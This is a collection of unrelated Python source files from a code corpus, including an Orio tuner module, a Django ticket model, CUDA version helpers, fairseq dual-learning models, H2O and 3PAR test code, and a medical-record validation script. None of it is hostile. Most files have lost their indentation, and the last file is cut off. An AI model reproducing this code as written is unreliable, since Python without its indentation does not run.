info('%s' % axis_val_ranges)
# combine the performance parameter constraints
pparam_constraint = 'True'
for vname, rhs in tinfo.pparam_constraints:
pparam_constraint += ' and (%s)' % rhs
# dynamically load the search engine class and configure it
if Globals().extern:
tinfo.search_algo='Extern'
info('Running in %s mode' % tinfo.search_algo)
info('Using parameters %s' % Globals().config)
class_name = tinfo.search_algo
mod_name = '.'.join([SEARCH_MOD_NAME, class_name.lower(), class_name.lower()])
search_class = self.dloader.loadClass(mod_name, class_name)
# convert the search time limit (from minutes to seconds) and get the total number of
# search runs
search_time_limit = 60 * tinfo.search_time_limit
search_total_runs = tinfo.search_total_runs
search_use_z3 = tinfo.search_use_z3
search_resume = tinfo.search_resume
# get the search-algorithm-specific arguments
search_opts = dict(tinfo.search_opts)
# perform the performance tuning for each distinct problem size
optimized_code_seq = []
for ptcodegen in ptcodegens:
if Globals().verbose:
info('\n----- begin empirical tuning for problem size -----')
            # Sort by variable name... not sure it's really necessary
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
info(' %s = %s' % (pname, pvalue))
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
Globals().metadata['size_' + pname] = pvalue
debug(ptcodegen.input_params[:])
# create the search engine
search_eng = search_class({'cfrags':cfrags, # code versions
'axis_names':axis_names, # performance parameter names
'axis_val_ranges':axis_val_ranges, # performance parameter values
'pparam_constraint':pparam_constraint,
'search_time_limit':search_time_limit,
'search_total_runs':search_total_runs,
'search_resume':search_resume,
'search_opts':search_opts,
'ptcodegen':ptcodegen,
'ptdriver':ptdriver, 'odriver':self.odriver,
'use_parallel_search':use_parallel_search,
'input_params':ptcodegen.input_params[:]})
# search for the best performance parameters
best_perf_params, best_perf_cost = search_eng.search()
# output the best performance parameters
if Globals().verbose and not Globals().extern:
info('----- the obtained best performance parameters -----')
pparams = sorted(list(best_perf_params.items()))
for pname, pvalue in pparams:
info(' %s = %s' % (pname, pvalue))
# generate the optimized code using the obtained best performance parameters
if Globals().extern:
best_perf_params=Globals().config
debug("[orio.main.tuner.tuner] Globals config: %s" % str(Globals().config), obj=self, level=6)
cur_optimized_code_seq = self.odriver.optimizeCodeFrags(cfrags, best_perf_params)
# check the optimized code sequence
if len(cur_optimized_code_seq) != 1:
err('orio.main.tuner internal error: the empirically optimized code cannot contain multiple versions')
# get the optimized code
optimized_code, _, externals = cur_optimized_code_seq[0]
# insert comments into the optimized code to include information about
# the best performance parameters and the input problem sizes
iproblem_code = ''
iparams = sorted(ptcodegen.input_params[:])
for pname, pvalue in iparams:
if pname == '__builtins__':
continue
iproblem_code += ' %s = %s \n' % (pname, pvalue)
pparam_code = ''
pparams = sorted(list(best_perf_params.items()))
for pname, pvalue in pparams:
if pname == '__builtins__':
continue
pparam_code += ' %s = %s \n' % (pname, pvalue)
info_code = '\n/**-- (Generated by Orio) \n'
if not Globals().extern:
info_code += 'Best performance cost: \n'
info_code += ' %s \n' % best_perf_cost
info_code += 'Tuned for specific problem sizes: \n'
info_code += iproblem_code
info_code += 'Best performance parameters: \n'
info_code += pparam_code
info_code += '--**/\n'
optimized_code = info_code + optimized_code
            # store the optimized code for this problem size
optimized_code_seq.append((optimized_code, ptcodegen.input_params[:], externals))
# return the optimized code
return optimized_code_seq
# Private methods
#-------------------------------------------------
def __extractTuningInfo(self, code, line_no):
'''Extract tuning information from the given annotation code'''
# parse the code
match_obj = re.match(r'^\s*import\s+spec\s+([/A-Za-z_]+);\s*$', code)
# if the code contains a single import statement
if match_obj:
# get the specification name
spec_name = match_obj.group(1)
spec_file = spec_name+'.spec'
try:
src_dir = '/'.join(list(Globals().src_filenames.keys())[0].split('/')[:-1])
spec_file_path = os.getcwd() + '/' + src_dir + '/' + spec_file
f = open(spec_file_path, 'r')
tspec_code = f.read()
f.close()
except:
err('%s: cannot open file for reading: %s' % (self.__class__, spec_file_path))
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseProgram(tspec_code)
# if the tuning specification is hardcoded into the given code
elif code.lstrip().startswith('spec'):
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseProgram(code)
else:
# parse the specification code to get the tuning information
tuning_spec_dict = orio.main.tspec.tspec.TSpec().parseSpec(code, line_no)
# return the tuning information
return tuning_spec_dict
#-------------------------------------------------
def __listAllCombinations(self, seqs):
'''
Enumerate all combinations of the given sequences.
e.g. input: [['a','b'],[1,2]] --> [['a',1],['a',2],['b',1],['b',2]]
'''
# the base case
if len(seqs) == 0:
return []
# the recursive step
trailing_combs = self.__listAllCombinations(seqs[1:])
if trailing_combs == []:
trailing_combs = [[]]
combs = []
for i in seqs[0]:
for c in trailing_combs:
combs.append([i] + c)
# return the combinations
return combs
#-------------------------------------------------
def __getProblemSizes(self, iparam_params, iparam_constraints):
'''Return all valid problem sizes'''
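        # Example (illustrative values): iparam_params = [('N', [10, 100]), ('M', [1, 2])]
        # with the constraint 'N > M' yields
        #   [[('N', 10), ('M', 1)], [('N', 10), ('M', 2)],
        #    [('N', 100), ('M', 1)], [('N', 100), ('M', 2)]]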
# combine the input parameter constraints
iparam_constraint = 'True'
for vname, rhs in iparam_constraints:
iparam_constraint += ' and (%s)' % rhs
# compute all possible combinations of problem sizes
prob_sizes = []
pnames, pvalss = list(zip(*iparam_params))
for pvals in self.__listAllCombinations(pvalss):
prob_sizes.append(list(zip(pnames, pvals)))
# exclude all invalid problem sizes
n_prob_sizes = []
for p in prob_sizes:
try:
is_valid = eval(iparam_constraint, dict(p))
except Exception as e:
err('orio.main.tuner.tuner:%s: failed to evaluate the input parameter constraint expression\n --> %s: %s' % (iparam_constraint,e.__class__.__name__, e))
if is_valid:
n_prob_sizes.append(p)
prob_sizes = n_prob_sizes
# check if the new problem sizes is empty
if len(prob_sizes) == 0:
err('orio.main.tuner.tuner: no valid problem sizes exist. please check the input parameter ' +
'constraints')
# return all possible combinations of problem sizes
return prob_sizes
#-------------------------------------------------
def __buildCoordSystem(self, perf_params, cmdline_params):
'''Return information about the coordinate systems that represent the search space'''
debug("BUILDING COORD SYSTEM", obj=self,level=3)
# get the axis names and axis value ranges
axis_names = []
axis_val_ranges = []
for pname, prange in perf_params:
axis_names.append(pname)
# BN: why on earth would someone do this?????
# axis_val_ranges.append(self.__sort(prange))
axis_val_ranges.append(prange)
for pname, prange in cmdline_params:
axis_names.append('__cmdline_' + pname)
axis_val_ranges.append(prange)
self.num_params=len(axis_names)
self.num_configs=1
self.num_bin=0
self.num_categorical = 0
self.num_int=self.num_params
ptype=[]
for vals in axis_val_ranges:
self.num_configs=self.num_configs*len(vals)
ptype.append('I')
if type(vals[0]) == bool:
self.num_bin=self.num_bin+1
ptype[len(ptype)-1]=('B')
if type(vals[0]) == str:
self.num_categorical = self.num_categorical+1
self.num_int -= self.num_bin
self.num_int -= self.num_categorical
info('Search_Space = %1.3e' % self.num_configs)
info('Number_of_Parameters = %02d' % self.num_params)
info('Numeric_Parameters = %02d' % self.num_int)
info('Binary_Parameters = %02d' % self.num_bin)
info('Categorical_Parameters = %02d' % self.num_categorical)
sys.stderr.write('%s\n'% Globals().configfile)
return (axis_names, axis_val_ranges)
| 2.671875 | 3 |
verify_data.py | goowell/DrAdvice | 0 | 11362 | from transformer import *
from logger import logger
def find_missing():
from db import paients_source, paients_info
import re
for pi in paients_info.find():
if paients_source.find({'_id': re.compile(pi['住院号'], re.IGNORECASE)}).count()>0:
pass
else:
print(pi['住院号'])
def verify_data(collection):
    'Verify that the data format is correct.'
for d in collection.find():
info = d.get('d').get('info')
if len(info) <12 and info[0] != '1':
logger.error('invalid patient info:' + d['_id']+str(info))
if len(d.get('d').get('doctor_advice')) == 0:
logger.error('invalid doctor advice:' + d['_id'])
else:
has_long = False
has_short = False
for a in d.get('d').get('doctor_advice'):
if len(a) != 18:
logger.error('invalid doctor advice:' + d['_id'])
logger.error("invalid doctor advice: " + a)
if a[3] == '长':
has_long = True
else:
has_short = True
if not (has_long and has_short):
logger.error('invalid doctor advice: ' + d['_id'] + ', long/short: {}/{}'.format(has_long, has_short) )
def get_info(collection):
'count PE'
for d in collection.find():
if len(d.get('d').get('doctor_advice')) == 0:
print('invalid doctor advice:' + d['_id'])
else:
one_p = split_all_ad(d)
print(one_p)
break
def main():
'main entry'
from datetime import datetime
from db import paients_source
start = datetime.now()
print('hello..')
# verify_data(paients_source)
# get_info(collection)
find_missing()
print(datetime.now() - start)
if __name__ == '__main__':
    main()
| 2.671875 | 3 |
jvm-packages/cudautils.py | NVIDIA/spark-xgboost | 15 | 11363 | #!/usr/bin/env python
import os
import re
import subprocess
import sys
# version -> classifier
# '' means default classifier
cuda_vers = {
'11.2': ['cuda11', '']
}
def check_classifier(classifier):
'''
Check the mapping from cuda version to jar classifier.
Used by maven build.
'''
cu_ver = detect_cuda_ver()
classifier_list = cuda_vers[cu_ver]
if classifier not in classifier_list:
raise Exception("Jar classifier '{}' mismatches the 'nvcc' version {} !".format(classifier, cu_ver))
def get_classifier():
cu_ver = detect_cuda_ver()
classifier_list = cuda_vers[cu_ver]
return classifier_list[0]
def get_supported_vers():
'''
Get the supported cuda versions.
'''
return cuda_vers.keys()
def get_supported_vers_str():
'''
Get the supported cuda versions and join them as a string.
Used by shell script.
'''
return ' '.join(cuda_vers.keys())
def detect_cuda_ver():
'''
Detect the cuda version from current nvcc tool.
'''
nvcc_ver_bin = subprocess.check_output('nvcc --version', shell=True)
nvcc_ver = re.search('release ([.0-9]+), V([.0-9]+)', str(nvcc_ver_bin)).group(1)
if nvcc_ver in get_supported_vers():
return nvcc_ver
else:
raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(nvcc_ver))
def cudaver():
return 'cuda{}'.format(detect_cuda_ver())
if __name__ == "__main__":
num_args = len(sys.argv)
action = sys.argv[1].lower() if num_args > 1 else 'l'
if action =='c':
classifier = sys.argv[2].lower() if num_args > 2 else ''
check_classifier(classifier)
elif action == 'd':
print(detect_cuda_ver())
elif action == 'g':
print(get_classifier())
elif action == 'l':
print(get_supported_vers_str())
else:
print("Unsupported action: " + action)
| 2.5625 | 3 |
hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 0 | 11364 | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hitchhikeapp', '0010_userdata_userid'),
]
operations = [
migrations.DeleteModel(
name='Dog',
),
]
| 1.59375 | 2 |
support/models.py | gurupratap-matharu/django-tickets-app | 1 | 11365 | <filename>support/models.py
import pytz
from datetime import date, time, datetime, timedelta
from django.core.exceptions import ValidationError
from django.db import models
START_HOUR = 9
END_HOUR = 18
workingHours = END_HOUR - START_HOUR
class Vendor(models.Model):
"""
This class defines which vendors are allowed raise tickets with our system.
"""
vendor = models.CharField(max_length=25)
def __str__(self):
return self.vendor
def no_past(value):
today = date.today()
if value < today:
raise ValidationError('Holiday Date cannot be in the past.')
class Holiday(models.Model):
"""
    Define the holidays or non-working days for each region.
"""
day = models.DateField(help_text="Enter the date of Holiday", validators=[no_past])
description = models.CharField(max_length=200, blank=True)
class Meta:
ordering = ('day',)
def __str__(self):
return "{} {}".format(self.day, self.description)
class Category(models.Model):
"""
We define the type of category to which a particular ticket belongs here.
"""
CATEGORY_CHOICES = (
('Website Down', 'Website Down'),
('Problem with WiFi', 'Problem with WiFi'),
('Server Down', 'Server Down'),
('Cannot Login', 'Cannot Login'),
('Critical Bug','Critical Bug'),
('Problem with Billing System','Problem with Billing System'),
)
category = models.CharField(max_length=50, choices=CATEGORY_CHOICES)
class Meta:
verbose_name_plural = "categories"
def __str__(self):
return self.category
class Ticket(models.Model):
"""
    Ticket model objects are created here and stored in the database
    as a table with the attributes mentioned below.
"""
SEVERITY_CHOICES = (
(4, 1), # severity 1 to be resolved in 4 hours
(24, 2), # severity 2 to be resolved in 24 hours
(72, 3), # severity 3 to be resolved in 72 hours / 3 days
(168, 4), # severity 4 to be resolved in 168 hours / 7 days
(720, 5), # severity 5 to be resolved in 720 hours / 30 days
)
STATUS_CHOICES = (
('Issued', 'Issued'), # ticket raised but not assigned
('In Process', 'In Process'), # ticket assigned
('Resolved', 'Resolved'), # ticket resolved
('Cancelled', 'Cancelled'),
)
vendor = models.ForeignKey(Vendor, on_delete=models.CASCADE)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
severity = models.PositiveIntegerField(choices=SEVERITY_CHOICES)
description = models.CharField(max_length=255)
status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='Issued')
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
expiry = models.DateTimeField(blank=True, null=True)
def save(self, *args, **kwargs):
"""
        Here we override the default `save` method to populate the expiry field
based on creation date, holidays and weekends.
"""
self.expiry = findExpiryDate(self.severity)
super().save(*args, **kwargs) # Call the "real" save() method.
def __str__(self):
return "{} | {} | {} ".format(self.vendor.vendor, self.category.category, self.created_at)
def findExpiryDate(sla):
"""
Finds the expiry date for a ticket based on
1. Severity of the ticket
2. Date of issue
"""
now = datetime.now()
flag = 1
    # if the ticket is received today between 00:00 and START_HOUR,
    # we reset the flag so the SLA clock can start today at START_HOUR
    if now.hour < START_HOUR:
        flag = 0
    # if the ticket is received today within office hours, simply
    # deduct the working hours left today from the SLA
    if START_HOUR < now.hour < END_HOUR:
        hoursLeftToday = END_HOUR - now.hour
        sla -= hoursLeftToday
tomorrow = date.today() + timedelta(days=flag)
shiftTime = time(START_HOUR,0,0)
dt = datetime.combine(tomorrow, shiftTime, pytz.utc)
    dt = adjust_Weekends_And_Holidays(dt)  # adjust in case we hit a weekend or holiday
# now we find the office days and office hours
# we would need to complete the sla
days, hours = divmod(sla, workingHours)
dt += timedelta(hours=hours)
    dt = adjust_Weekends_And_Holidays(dt, days=days)  # adjust in case we hit a weekend or holiday
return dt
def isWeekend(dt):
"""Finds if a date lies on a weekend or not. Returns a boolean"""
    # weekday() is 0 (Monday) through 6 (Sunday); 5 and 6 fall on the weekend
    return dt.weekday() >= 5
def isHoliday(dt):
"""Finds if a date lies on a holiday or not. Returns a boolean"""
return Holiday.objects.filter(day=dt.date()).exists()
def adjust_Weekends_And_Holidays(dt, days=0):
"""
    Adjust the datetime to a future datetime accommodating for
    1. days needed
    2. skipping weekends and holidays
"""
while isWeekend(dt) or isHoliday(dt):
dt += timedelta(days=1)
while days:
dt += timedelta(days=1)
if isWeekend(dt) or isHoliday(dt):
continue
else:
days -= 1
return dt
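# Minimal usage sketch (assumes a configured Django project with this app installed;
# the concrete field values below are illustrative):
#
#   vendor = Vendor.objects.create(vendor="Acme")
#   category = Category.objects.create(category="Server Down")
#   ticket = Ticket.objects.create(vendor=vendor, category=category,
#                                  severity=4, description="API is down")
#   # Ticket.save() fills `expiry` via findExpiryDate(4): 4 working hours counted
#   # from the next office-hours slot, skipping weekends and holidays.
#   print(ticket.expiry)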
| 2.890625 | 3 |
tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 7 | 11366 | <gh_stars>1-10
from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
@given(strategies.points)
def test_basic(point: PortedPoint) -> None:
assert isinstance(point.bounding_box, PortedBoundingBox)
@given(strategies.points, strategies.points)
def test_bijection(first_point: PortedPoint,
second_point: PortedPoint) -> None:
assert equivalence(first_point == second_point,
first_point.bounding_box == second_point.bounding_box)
| 2.546875 | 3 |
test/conftest.py | alexandonian/lightning | 0 | 11367 | <reponame>alexandonian/lightning
import pytest
# import station
def pytest_addoption(parser):
parser.addoption("--engine", action="store", default="local",
help="engine to run tests with")
@pytest.fixture(scope='module')
def eng(request):
engine = request.config.getoption("--engine")
if engine == 'local':
return None
    if engine == 'spark':
        # `station` is an optional dependency (its top-level import above is commented
        # out), so import it lazily only when the spark engine is requested
        import station
        station.start(spark=True)
        return station.engine()
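# Usage sketch: select the engine on the pytest command line, e.g.
#   pytest --engine=local    # default; the `eng` fixture returns None
#   pytest --engine=spark    # starts a spark-backed engine via the optional `station` package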
| 2.140625 | 2 |
pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 1 | 11368 | #!/usr/bin/env python3
import logging
import torch.nn as nn
from fairseq import checkpoint_utils
from fairseq.models import BaseFairseqModel, register_model
from pytorch_translate import rnn
from pytorch_translate.rnn import (
LSTMSequenceEncoder,
RNNDecoder,
RNNEncoder,
RNNModel,
base_architecture,
)
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
logger = logging.getLogger(__name__)
@register_model("dual_learning")
class DualLearningModel(BaseFairseqModel):
"""
An architecture to jointly train primal model and dual model by leveraging
    distribution duality, which exists for both parallel data and monolingual
data.
"""
def __init__(self, args, task, primal_model, dual_model, lm_model=None):
super().__init__()
self.args = args
self.task_keys = ["primal", "dual"]
self.models = nn.ModuleDict(
{"primal": primal_model, "dual": dual_model, "lm": lm_model}
)
def forward(self, src_tokens, src_lengths, prev_output_tokens=None):
"""
If batch is monolingual, need to run beam decoding to generate
fake prev_output_tokens.
"""
# TODO: pass to dual model too
primal_encoder_out = self.models["primal"].encoder(src_tokens, src_lengths)
primal_decoder_out = self.models["primal"].decoder(
prev_output_tokens, primal_encoder_out
)
return primal_decoder_out
def max_positions(self):
return {
"primal_source": (
self.models["primal"].encoder.max_positions(),
self.models["primal"].decoder.max_positions(),
),
"dual_source": (
self.models["dual"].encoder.max_positions(),
self.models["dual"].decoder.max_positions(),
),
"primal_parallel": (
self.models["primal"].encoder.max_positions(),
self.models["primal"].decoder.max_positions(),
),
"dual_parallel": (
self.models["dual"].encoder.max_positions(),
self.models["dual"].decoder.max_positions(),
),
}
@register_model("dual_learning_rnn")
class RNNDualLearningModel(DualLearningModel):
"""Train two models for a task and its duality jointly.
    This class uses an RNN arch, but can be extended to take the arch as an argument.
This class takes translation as a task, but the framework is intended
to be general enough to be applied to other tasks as well.
"""
def __init__(self, args, task, primal_model, dual_model, lm_model=None):
super().__init__(args, task, primal_model, dual_model, lm_model)
@staticmethod
def add_args(parser):
rnn.RNNModel.add_args(parser)
parser.add_argument(
"--unsupervised-dual",
default=False,
action="store_true",
help="Train with dual loss from monolingual data.",
)
parser.add_argument(
"--supervised-dual",
default=False,
action="store_true",
help="Train with dual loss from parallel data.",
)
@classmethod
def build_model(cls, args, task):
""" Build both the primal and dual models.
For simplicity, both models share the same arch, i.e. the same model
params would be used to initialize both models.
Support for different models/archs would be added in further iterations.
"""
base_architecture(args)
if args.sequence_lstm:
encoder_class = LSTMSequenceEncoder
else:
encoder_class = RNNEncoder
decoder_class = RNNDecoder
encoder_embed_tokens, decoder_embed_tokens = RNNModel.build_embed_tokens(
args, task.primal_src_dict, task.primal_tgt_dict
)
primal_encoder = encoder_class(
task.primal_src_dict,
embed_dim=args.encoder_embed_dim,
embed_tokens=encoder_embed_tokens,
cell_type=args.cell_type,
num_layers=args.encoder_layers,
hidden_dim=args.encoder_hidden_dim,
dropout_in=args.encoder_dropout_in,
dropout_out=args.encoder_dropout_out,
residual_level=args.residual_level,
bidirectional=bool(args.encoder_bidirectional),
)
primal_decoder = decoder_class(
src_dict=task.primal_src_dict,
dst_dict=task.primal_tgt_dict,
embed_tokens=decoder_embed_tokens,
vocab_reduction_params=args.vocab_reduction_params,
encoder_hidden_dim=args.encoder_hidden_dim,
embed_dim=args.decoder_embed_dim,
out_embed_dim=args.decoder_out_embed_dim,
cell_type=args.cell_type,
num_layers=args.decoder_layers,
hidden_dim=args.decoder_hidden_dim,
attention_type=args.attention_type,
dropout_in=args.decoder_dropout_in,
dropout_out=args.decoder_dropout_out,
residual_level=args.residual_level,
averaging_encoder=args.averaging_encoder,
)
primal_task = PytorchTranslateTask(
args, task.primal_src_dict, task.primal_tgt_dict
)
primal_model = rnn.RNNModel(primal_task, primal_encoder, primal_decoder)
if args.pretrained_forward_checkpoint:
pretrained_forward_state = checkpoint_utils.load_checkpoint_to_cpu(
args.pretrained_forward_checkpoint
)
primal_model.load_state_dict(pretrained_forward_state["model"], strict=True)
print(
f"Loaded pretrained primal model from {args.pretrained_forward_checkpoint}"
)
encoder_embed_tokens, decoder_embed_tokens = RNNModel.build_embed_tokens(
args, task.dual_src_dict, task.dual_tgt_dict
)
dual_encoder = encoder_class(
task.dual_src_dict,
embed_dim=args.encoder_embed_dim,
embed_tokens=encoder_embed_tokens,
cell_type=args.cell_type,
num_layers=args.encoder_layers,
hidden_dim=args.encoder_hidden_dim,
dropout_in=args.encoder_dropout_in,
dropout_out=args.encoder_dropout_out,
residual_level=args.residual_level,
bidirectional=bool(args.encoder_bidirectional),
)
dual_decoder = decoder_class(
src_dict=task.dual_src_dict,
dst_dict=task.dual_tgt_dict,
embed_tokens=decoder_embed_tokens,
vocab_reduction_params=args.vocab_reduction_params,
encoder_hidden_dim=args.encoder_hidden_dim,
embed_dim=args.decoder_embed_dim,
out_embed_dim=args.decoder_out_embed_dim,
cell_type=args.cell_type,
num_layers=args.decoder_layers,
hidden_dim=args.decoder_hidden_dim,
attention_type=args.attention_type,
dropout_in=args.decoder_dropout_in,
dropout_out=args.decoder_dropout_out,
residual_level=args.residual_level,
averaging_encoder=args.averaging_encoder,
)
dual_task = PytorchTranslateTask(args, task.dual_src_dict, task.dual_tgt_dict)
dual_model = rnn.RNNModel(dual_task, dual_encoder, dual_decoder)
if args.pretrained_backward_checkpoint:
pretrained_backward_state = checkpoint_utils.load_checkpoint_to_cpu(
args.pretrained_backward_checkpoint
)
dual_model.load_state_dict(pretrained_backward_state["model"], strict=True)
print(
f"Loaded pretrained dual model from {args.pretrained_backward_checkpoint}"
)
        # TODO (T36875783): instantiate a language model
lm_model = None
return RNNDualLearningModel(args, task, primal_model, dual_model, lm_model)
| 2.421875 | 2 |
thgsp/sampling/__init__.py | qiuyy20/thgsp | 0 | 11369 | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
__all__ = [
"ess",
"ess_sampling",
"bsgda",
"computing_sets",
"solving_set_covering",
"cheby_coeff4ideal_band_pass",
"estimate_lk",
"rsbs",
"fastgsss",
# reconstruction
"recon_fastssss",
"recon_bsgda",
"recon_ess",
"recon_rsbs",
# utils
"construct_sampling_matrix",
"construct_hth",
"construct_dia",
]
| 1.140625 | 1 |
h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 1 | 11370 | <filename>h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py
import tempfile
import os
import sys
sys.path.insert(1,"../../")
import h2o
from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing, compare_params
def test(x, y, output_test, strip_part, algo_name, generic_algo_name, family):
# GLM
airlines = h2o.import_file(path=pyunit_utils.locate("smalldata/testng/airlines_train.csv"))
glm = H2OGeneralizedLinearEstimator(nfolds = 2, family = family, max_iterations=2) # alpha = 1, lambda_ = 1, bad values, use default
glm.train(x = x, y = y, training_frame=airlines, validation_frame=airlines, )
print(glm)
with Capturing() as original_output:
glm.show()
original_model_filename = tempfile.mkdtemp()
original_model_filename = glm.download_mojo(original_model_filename)
generic_mojo_model_from_file = H2OGenericEstimator.from_file(original_model_filename)
assert generic_mojo_model_from_file is not None
print(generic_mojo_model_from_file)
compare_params(glm, generic_mojo_model_from_file)
with Capturing() as generic_output:
generic_mojo_model_from_file.show()
output_test(str(original_output), str(generic_output), strip_part, algo_name, generic_algo_name)
predictions = generic_mojo_model_from_file.predict(airlines)
assert predictions is not None
assert predictions.nrows == 24421
assert generic_mojo_model_from_file._model_json["output"]["model_summary"] is not None
assert len(generic_mojo_model_from_file._model_json["output"]["model_summary"]._cell_values) > 0
assert generic_mojo_model_from_file._model_json["output"]["variable_importances"] is not None
assert len(generic_mojo_model_from_file._model_json["output"]["variable_importances"]._cell_values) > 0
    generic_mojo_filename = tempfile.mkdtemp("zip", "genericMojo")
generic_mojo_filename = generic_mojo_model_from_file.download_mojo(path=generic_mojo_filename)
assert os.path.getsize(generic_mojo_filename) == os.path.getsize(original_model_filename)
def mojo_model_test_binomial():
test(["Origin", "Dest"], "IsDepDelayed", compare_output, 'GLM Model: summary', 'ModelMetricsBinomialGLM: glm',
'ModelMetricsBinomialGLMGeneric: generic', 'binomial')
def mojo_model_test_regression():
test(["Origin", "Dest"], "Distance", compare_output, 'GLM Model: summary', 'ModelMetricsRegressionGLM: glm',
'ModelMetricsRegressionGLMGeneric: generic', 'gaussian')
def mojo_model_test_multinomial():
test(["Origin", "Distance"], "Dest", compare_output, 'GLM Model: summary', 'ModelMetricsMultinomialGLM: glm',
'ModelMetricsMultinomialGLMGeneric: generic', 'multinomial')
def mojo_model_test_ordinal():
test(["Origin", "Distance", "IsDepDelayed"], "fDayOfWeek", compare_output, 'GLM Model: summary',
'ModelMetricsOrdinalGLM: glm',
'ModelMetricsOrdinalGLMGeneric: generic', 'ordinal')
if __name__ == "__main__":
pyunit_utils.standalone_test(mojo_model_test_binomial)
pyunit_utils.standalone_test(mojo_model_test_multinomial)
pyunit_utils.standalone_test(mojo_model_test_regression)
pyunit_utils.standalone_test(mojo_model_test_ordinal)
else:
mojo_model_test_binomial()
mojo_model_test_multinomial()
mojo_model_test_regression()
mojo_model_test_ordinal()
| 2.328125 | 2 |
test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | 35 | 11371 | <filename>test/HPE3ParClient_base.py
# (c) Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test base class of 3PAR Client."""
import os
import sys
import unittest
import subprocess
import time
import inspect
from pytest_testconfig import config
import datetime
from functools import wraps
from hpe3parclient import client, file_client
TIME = datetime.datetime.now().strftime('%H%M%S')
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urllib2
from urlparse import urlparse
class HPE3ParClientBaseTestCase(unittest.TestCase):
user = config['TEST']['user']
    password = config['TEST']['pass']
flask_url = config['TEST']['flask_url']
url_3par = config['TEST']['3par_url']
debug = config['TEST']['debug'].lower() == 'true'
unitTest = config['TEST']['unit'].lower() == 'true'
port = None
remote_copy = config['TEST']['run_remote_copy'].lower() == 'true'
run_remote_copy = remote_copy and not unitTest
if run_remote_copy:
secondary_user = config['TEST_REMOTE_COPY']['user']
secondary_password = config['TEST_REMOTE_COPY']['pass']
secondary_url_3par = config['TEST_REMOTE_COPY']['3par_url']
secondary_target_name = config['TEST_REMOTE_COPY']['target_name']
ssh_port = None
if 'ssh_port' in config['TEST']:
ssh_port = int(config['TEST']['ssh_port'])
elif unitTest:
ssh_port = 2200
else:
ssh_port = 22
# Don't setup SSH unless needed. It slows things down.
withSSH = False
if 'domain' in config['TEST']:
DOMAIN = config['TEST']['domain']
else:
DOMAIN = 'UNIT_TEST_DOMAIN'
if 'cpg_ldlayout_ha' in config['TEST']:
CPG_LDLAYOUT_HA = int(config['TEST']['cpg_ldlayout_ha'])
if 'disk_type' in config['TEST']:
DISK_TYPE = int(config['TEST']['disk_type'])
CPG_OPTIONS = {'domain': DOMAIN,
'LDLayout': {'HA': CPG_LDLAYOUT_HA,
'diskPatterns': [{'diskType':
DISK_TYPE}]}}
else:
CPG_OPTIONS = {'domain': DOMAIN,
'LDLayout': {'HA': CPG_LDLAYOUT_HA}}
else:
CPG_LDLAYOUT_HA = None
CPG_OPTIONS = {'domain': DOMAIN}
if 'known_hosts_file' in config['TEST']:
known_hosts_file = config['TEST']['known_hosts_file']
else:
known_hosts_file = None
if 'missing_key_policy' in config['TEST']:
missing_key_policy = config['TEST']['missing_key_policy']
else:
missing_key_policy = None
def setUp(self, withSSH=False, withFilePersona=False):
self.withSSH = withSSH
self.withFilePersona = withFilePersona
cwd = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
if self.unitTest:
self.printHeader('Using flask ' + self.flask_url)
parsed_url = urlparse(self.flask_url)
userArg = '-user=%s' % self.user
            passwordArg = '-password=%s' % self.password
portArg = '-port=%s' % parsed_url.port
script = 'HPE3ParMockServer_flask.py'
path = "%s/%s" % (cwd, script)
try:
self.mockServer = subprocess.Popen([sys.executable,
path,
userArg,
passwordArg,
portArg],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE
)
except Exception:
pass
time.sleep(1)
if self.withFilePersona:
self.cl = file_client.HPE3ParFilePersonaClient(self.flask_url)
else:
self.cl = client.HPE3ParClient(self.flask_url)
if self.withSSH:
self.printHeader('Using paramiko SSH server on port %s' %
self.ssh_port)
ssh_script = 'HPE3ParMockServer_ssh.py'
ssh_path = "%s/%s" % (cwd, ssh_script)
self.mockSshServer = subprocess.Popen([sys.executable,
ssh_path,
str(self.ssh_port)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
time.sleep(1)
else:
if withFilePersona:
self.printHeader('Using 3PAR %s with File Persona' %
self.url_3par)
self.cl = file_client.HPE3ParFilePersonaClient(self.url_3par)
else:
self.printHeader('Using 3PAR ' + self.url_3par)
self.cl = client.HPE3ParClient(self.url_3par)
if self.withSSH:
# This seems to slow down the test cases, so only use this when
# requested
if self.unitTest:
